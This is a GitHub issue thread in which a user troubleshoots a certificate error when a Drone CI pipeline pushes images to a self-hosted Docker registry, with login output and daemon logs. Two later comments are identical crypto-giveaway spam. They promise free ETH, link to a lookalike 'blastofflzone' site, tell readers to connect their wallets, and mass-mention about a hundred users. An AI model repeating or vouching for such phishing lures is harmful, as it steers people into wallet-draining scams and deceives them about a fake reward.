### ISSUE TITLE
Docker-bind problems originating frm .drone.yaml

### ISSUE THREAD

**Issue by pervrosen** [wenweih/drone-gogs-registry-example#1]
Hi. The docker-bind container is not able to logon to the registry. I have indeed checked that a manual exec into the docker-bind container can do a docker logon to the local registry and even push and pull. However when writing a .drone.yaml file to push image localreg:port/image:tag  to localreg:port I fail miserably. I think that an example .drone.yaml file would prove very valuable to users like me trying to leverage your otherwise excellent description. Also, I suspect there is some dockerindocker in play here where the ca.crt plus client certs gets lost on the way. However this is only my thoughts that I hope you can clarify for me. 

Manually login:

> docker exec -it docker-bind /bin/sh
/ # docker login 10.0.0.2:5000
Username (registry): registry
Password: 
Login Succeeded
/ # 

Execution log from drone running docker-bind

time="2020-03-25T19:53:54.148024618Z" level=info msg="Error logging in to v2 endpoint, trying next endpoint: Get https://10.0.0.2:5000/v2/: x509: certificate signed by unknown authority"
--
76 | time="2020-03-25T19:53:54.148076076Z" level=error msg="Handler for POST /v1.39/auth returned error: Get https://10.0.0.2:5000/v2/: x509: certificate signed by unknown authority"

Br, Per v R

**Comment by pervrosen** [comment]
After som thoughts I think the certs are missing in the image plugins/docker. Do you agree? If so we have a full off grid ci and registry solution.

**Comment by felixovelar** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
Powduck-Q, @liasica, @li13407281692, @OogieBoogieInJSON, @S74nk0, @disy-yin, @suifengtec, @wcpannell, @XiaoweiQian, @voratham, @Othman21, @huzhuo, @juniorcines, @zhouao, @sshamanov, @wott86, @SpeedMe, @AlexanderKai, @youngqqcn, @itsbalamurali, @auttasak, @ccavus, @wangluen, @andresvanegas19, @raineroviir, @Redrrx, @Britzell, @jamiedevsandbox, @lexruee, @xussr, @TomMaSS, @EventideGlow, @saymoon, @michaeljfazio, @hondziuuu, @shrBest, @wocorpse, @marc-chen, @leejw51, @Serpent6877, @DanielFranco-NEUenergy, @helperShang, @axsaucedo, @Vargpost, @Gerard19742608jourdain, @mimispec, @thalidzhokov, @dis-aster, @amustafa, @avollmar1488kolkov, @CodeBradley, @michelpereira, @shimza, @debris, @YazzyYaz, @TimonPeng, @rogeryan, @TravnikovDev, @hahatyn, @davembg, @DukeDeng, @lingfan, @hschen2k, @itimflint, @shengzhc, @kennylbj, @li13407281692, @ybz216, @liaonily, @amustafa, @shushanxingzhe, @ai-worm, @Bigshooter, @zhengger, @cawa0505, @mswezey23, @Jh623, @lukeddy, @mkrufky, @luponata, @linkwechat, @fortunto2, @AlexanderKozhevin, @imjszhang, @, @duartebruno, @ivories, @wufeiafei, @OogieBoogieInJSON, @plebasaur, @cooboyno111, @lycoderchen, @theassyrian, @dendisuhubdy, @d3QUone, @lstarby, @San-Zero, @nerotiger, @SaliZumberi

**Comment by josuecv26** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
Theo-Web-Ledger, @DrangPo, @ARyaskov, @vbrekher, @rmachuca89, @WillKre, @bl0ckcha1nbud, @monkey0722, @BlizzardBlue, @kenneth, @billiamdan, @Lpaydat, @danielbahrami, @darrennong, @joren485, @rallao, @antares-me, @fabiodr, @marvin8, @mmaton, @veox, @lmacken, @Tigeco, @mattsulony, @EtherTyper, @thenuancer, @lucylow, @jadanah, @emapeire, @contpund, @ibiscp, @fvicard, @rstmsn, @muz3, @dweigel40, @Zaczero, @mikesteele, @nfsc-tommy, @nieheyong, @ajdexter, @andruyd, @Baby8093girl, @samyk, @jaygriz, @kimar, @phnx47, @teopeurt, @halfwolf0x, @hadronized, @mirzalazuardiCrystallineButterfly, @jarriagadat, @sean808080, @suriyaa, @yonix06, @cryptomole1, @arshad115, @johnywellington, @jasonrpoteet, @craigbranscom, @HutmacherDK, @ibiscp, @mmalecot, @Erkansukgen, @scalabilitysolved, @rstmsn, @ChowZenki, @fhoxh, @nicolaspln, @kiwiprofesor, @Tobben67, @jaygriz, @meafs, @zhoushuren, @jontis, @ajdexter, @omgbbqhaxx, @savuvictor, @joshuarubin, @wpank, @alamminsalo, @ben2ben4042, @boczeratul, @dennisreimann, @franciosi, @FlyingHen, @mrnonz, @jakubreron, @JulienDlq, @jcoffland, @tomsapps, @Marcsmyname, @sshmaxime, @invisageable, @dliuproduction, @lmacken, @tbalbueno, @mijailr, @t0thkr1s, @joren485
